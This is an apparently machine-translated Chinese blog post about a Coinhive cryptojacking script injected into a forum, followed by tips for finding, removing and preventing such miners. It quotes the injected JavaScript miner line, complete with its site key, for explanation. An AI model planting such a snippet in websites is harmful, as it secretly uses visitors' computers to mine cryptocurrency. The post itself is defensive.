如何从您的网站删除Coinhive crypto-mining脚本

我通常每天都会访问论坛，并且前一天我没有看到它。所以我认为这是在我睡觉的那个夜晚，我的时间发生的一段时间。

我使用vBulletin软件进行论坛，并且更新到最新版本。此外，对于我们来说，这非常令人惊讶，因为TheWindowsClub.com域使用 Sucuri Web Antivirus&Firewall 来保护自己免受在线网络威胁和攻击。

我的PC安全软件已成功阻止恶意脚本运行在我的Windows 10电脑上。我查看了Chrome和Edge等其他浏览器，结果相同

在论坛网页上右键单击并查看源代码后，我发现它是CoinHive的CryptoMiner恶意脚本。

这是恶意的Coinhive Javascript已经进入我的论坛代码：

var miner = new CoinHive.Anonymous（“FG1d35B2h5xqzgJW0bbfyHT22ud9RnEm”）; miner.start（）;

无论如何，我做的第一件事是采取论坛并告知Sucuri。

Sucuri人清理了Coinhive脚本的论坛，该脚本几小时内被推入我的论坛，所有 都没有问题。

什么是CoinHive

Coinhive优惠一个用于Monero加密货币的JavaScript矿工，您可以将其嵌入到您的网站中，并使用网站访问者计算机的CPU为您挖掘硬币。

这称为 Cryptojacking 。它涉及劫持用户的浏览器进行加密货币挖掘。一些网站所有者可能自己使用它来赚钱 - 但在我们的案例中，它已被注入。

当用户访问受感染的站点时，Coinhive JavaScript执行并利用用户的CPU资源开采Monero。这可能会导致CPU节流和受害者机器意外的系统崩溃。

现在，如果您的浏览器受到感染，您将看到您的资源利用率上升。关闭浏览器，它会掉落。用户可能会注意到他的机器正在升温，风扇运转得很快，或者电池快速流失。

我问我的同事Saurabh Mukhekar使用他的 Mac 访问我的论坛，看看发生了什么。那么，当他用Safari打开论坛时，他的Mac电脑也受到了影响！他是那些为他的Mac使用防病毒软件的智能Mac OSX用户之一。他的Avast antivirus for Mac成功阻止了恶意脚本的运行。

说Saurabh，

CoinHive恶意软件不仅劫持Windows PC，而且也劫持Mac，因为它是基于浏览器的Javascript感染。我不相信神话中的Macs不需要防病毒软件，否则我的机器会被感染，我的Mac会继续为其他人制造硬币。

防止CoinHive感染您的网站

1. 请勿在您的网站/论坛上使用任何NULL模板或插件
2. 请将您的CMS更新为最新版本
3. 定期更新您的托管软件（PHP，数据库等）。
4. 使用Sucuri，Cloudflare，Wordfence等网络安全提供商保护您的网站。
5. 采取基本的预防措施以保护您的博客。

从网站中移除CoinHive矿工

首先，您需要成为网站管理员受感染的网站 - 或者拥有管理凭据，可以访问所有网站文件。

现在，当您的防病毒软件检测到CoinHive感染时，右键单击网页并选择 查看源代码 。接下来按 Ctrl + F 并搜索“CoinHive”。

确定恶意代码的位置后，您需要查看其位置 - 它位于何处。现在你需要手动删除它。要做到这一点，您需要对您的平台有一定的编码知识。您必须找到受感染的文件并手动从上面删除脚本。如果您不确定，请咨询专家。由于我们使用Sucuri，我们让他们这样做。

完成之后，清除您的服务器和浏览器缓存。如果您正在使用任何缓存插件或说MaxCDN，请清除这些缓存。

防止加密挖掘脚本

加密货币和区块链技术正在占领世界。它正在对全球经济产生影响，并导致技术中断。每个人都开始关注这样一个利润丰厚的市场 - 这也包括网站黑客。随着回报增加，我们应该期望这些技术会被滥用。这是任何新兴技术的黑暗面。

我们所能做的就是始终采取最好的预防措施。除了使用良好的安全软件之外，还可以使用Chrome或Firefox扩展程序来阻止网站使用您的CPU来挖掘Cryptocurrency - 或者更好的是，使用Anti-WebMiner，通过修改您的Hosts文件来停止Cryptojacking Mining Script攻击。它适用于所有浏览器。如果您是Mac用户，请为您的计算机安装防病毒软件。

作为一种预防措施，如果您觉得自己可能访问过受感染的站点，清除浏览器将是一个不错的主意缓存并使用防病毒软件以及AdwCleaner扫描您的设备。

保持安全，保持警惕！